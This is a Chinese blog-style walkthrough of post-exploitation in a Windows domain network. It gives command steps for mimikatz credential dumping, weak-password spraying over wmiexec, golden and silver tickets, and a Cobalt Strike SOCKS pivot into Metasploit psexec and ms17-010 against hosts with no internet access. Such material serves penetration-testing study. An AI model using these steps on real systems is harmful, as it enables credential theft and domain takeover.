内网渗透-域内有网和无网

文章目录

  • 前言
  • 域内主机有网
    • 攻击流程
  • 域内主机无网
    • 操作流程

前言

在渗透测试的过程中,拿下域内一台主机以后,有时候内网的其他主机有网,有时候没网,此时,如果有网我们就按常规的渗透测试即可,如果没网我们就应该以该主机作为跳板,使用socks协议或其他办法,从而实现与无网的主机进行通信

域内主机有网

内网渗透-域内有网和无网_第1张图片

攻击流程

通过域环境webserver主机的外网WEB服务开启到域控权限的获取
假如已经获取webserver权限:
0x01:

  • 通过phpmyadmin弱口令getshell

0x02:

  • msf生成 msf监听 getsystem upload ‘/root/x64’ c:\test mimikatz
    privilege::debug sekurlsa::logonpasswords

0x03:

  • 批处理wmicexec测试弱口令 29 31 32 IP存在

0x04:

  • 获取29 31 32权限 反弹msf getsystem

0x05

  • 批处理wmicexec测试弱口令 21中标
  • execute -f cmd.exe -H -i 0x06
  • 导出所有hash 进行黄金白银票据

域内主机无网

内网渗透-域内有网和无网_第2张图片
Msf

  • 拿下weserver,发现有两个网段,192.168.3.31 192.168.230.131
    假设192.168.230.131为外网,192.168.3.31为内网
  • 又发现内网其他主机都没有联网,只有webserver联网了。
  • 此时,可以用webserver作为跳板,用cs开启socks,并用msf

操作流程

#cobalt strike

  • 启动,监听,生成,上线,提权
  • cs启动sockt4 生成监听端口跳板,将setg Proxies
  • socks4:192.168.230.133:xxxxx复制到msf

msfconsole

  • 加载代理:setg Proxies socks4:192.168.230.133:xxxxx
  • 攻击模块:ms17010 ms14068 smb psexec等
  • use exploit/windows/smb/psexec

#自己绑定自己,就实现了无网探针

  • set payload bind_tcp
  • set smbuser administrator
  • set smbpass admin!@#45
  • 上传mimikatz:upload ‘/root/x64’ c:\test
  • mimikatz privilege::debug sekurlsa::logonpasswords

你可能感兴趣的:(内网渗透)